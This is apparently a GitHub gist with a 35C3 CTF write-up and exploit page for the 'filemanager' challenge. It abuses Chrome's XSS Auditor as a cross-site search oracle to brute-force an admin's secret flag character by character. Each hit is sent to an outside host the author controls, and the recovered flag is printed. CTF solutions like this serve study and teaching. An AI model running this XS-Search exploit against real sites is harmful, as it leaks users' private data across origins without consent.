| <body> | |
| <!-- | |
| Briefly, we all know that flag is stored as `file` in admin account. Plus, the flag is in the format: 35C3_*** | |
| When we searching content of a file, if it does exists, there is a script which doing highlight the found word by yellow <mark> | |
| For example: https://filemanager.appspot.com/search?q=def | |
| <h1>abc</h1> | |
| <pre>def</pre> | |
| <script> | |
| (()=>{ | |
| for (let pre of document.getElementsByTagName('pre')) { | |
| let text = pre.innerHTML; | |
| let q = 'def'; | |
| let idx = text.indexOf(q); | |
| pre.innerHTML = `${text.substr(0, idx)}<mark>${q}</mark>${text.substr(idx+q.length)}`; | |
| } | |
| })(); | |
| </script> | |
| Okay, now let's go to XSS Auditor part. | |
| Try this on Chrome (yea we should, since the description saying that the admin is using Chrome-headless) | |
| view-source:https://filemanager.appspot.com/search?q=def&a=%3Cscript%3E%20%20%20%20%28%28%29%3d%3E%7b%0a%20%20%20%20%20%20for%20%28let%20pre%20of%20document%2egetElementsByTagName%28%27pre%27%29%29%20%7b%0a%20%20%20%20%20%20%20%20let%20text%20%3d%20pre%2einnerHTML%3b | |
| You can see the red alert, which means that XSS-Auditor found a XSS vector on our URL (`a` param) which also showing in the page's content. But in fact, it's *NOT XSS* , this is side effect of the auditor | |
| We leverage on its mechanism to detect whether there is search result (guessing flag) or not. | |
| * To clarify: `a` is just foo parameter name, we just wanna make XSS-Auditor see it's as XSS vector. | |
| But how do we do that ? Since XSS-Auditor will detect and block the page, redirect the page to `chrome-error://chromewebdata/` as well. | |
| Now the trick comes by. by reading this post: https://portswigger.net/blog/exposing-intranets-with-reliable-browser-based-port-scanning | |
| I found out, it's possible to detect if the browser redirects to other page. | |
| Yep, and that's all. | |
| We can guess the flag by performing XS-Search leverage on XSS-Auditor | |
| --> | |
| <script> | |
| var URL = 'https://filemanager.appspot.com/search?q={{search}}&a=%3Cscript%3E%20%20%20%20%28%28%29%3d%3E%7b%0a%20%20%20%20%20%20for%20%28let%20pre%20of%20document%2egetElementsByTagName%28%27pre%27%29%29%20%7b%0a%20%20%20%20%20%20%20%20let%20text%20%3d%20pre%2einnerHTML%3b'; | |
| var charset = '_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^`{|}~'; | |
| var brute = new URLSearchParams(location.search).get('brute') || '35C3_'; | |
| function guess(i){ | |
| var go = brute + charset[i]; | |
| var x = document.createElement('iframe'); | |
| x.name = 'blah'; | |
| var calls = 0; | |
| x.onload = () => { | |
| calls++; | |
| if(calls > 1){ | |
| // so here is calling 2nd onload which means the xss auditor blocking this and the page is redirected to chrome-error:// | |
| // https://portswigger.net/blog/exposing-intranets-with-reliable-browser-based-port-scanning | |
| console.log("GO IT ==> ",go); | |
| location.href = 'http://deptrai.l4w.pw/35c3/go.html?brute='+escape(go); | |
| x.onload = ()=>{}; | |
| } | |
| var anchor = document.createElement('a'); | |
| anchor.target = x.name; | |
| anchor.href = x.src+'#'; | |
| anchor.click(); | |
| anchor = null; | |
| } | |
| x.src = URL.replace('{{search}}',go); | |
| document.body.appendChild(x); | |
| setTimeout(() =>{ | |
| document.body.removeChild(x); | |
| guess(i+1); | |
| },1000); | |
| } | |
| guess(0); | |
| // FLAG: 35C3_xss_auditor_for_the_win | |
| </script> | |
| </body> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
X-Cotang commentedJan 10, 2019
Hic! Pro có thể nói rõ hơn đc không?? :)) Mong đc chỉ giáo :v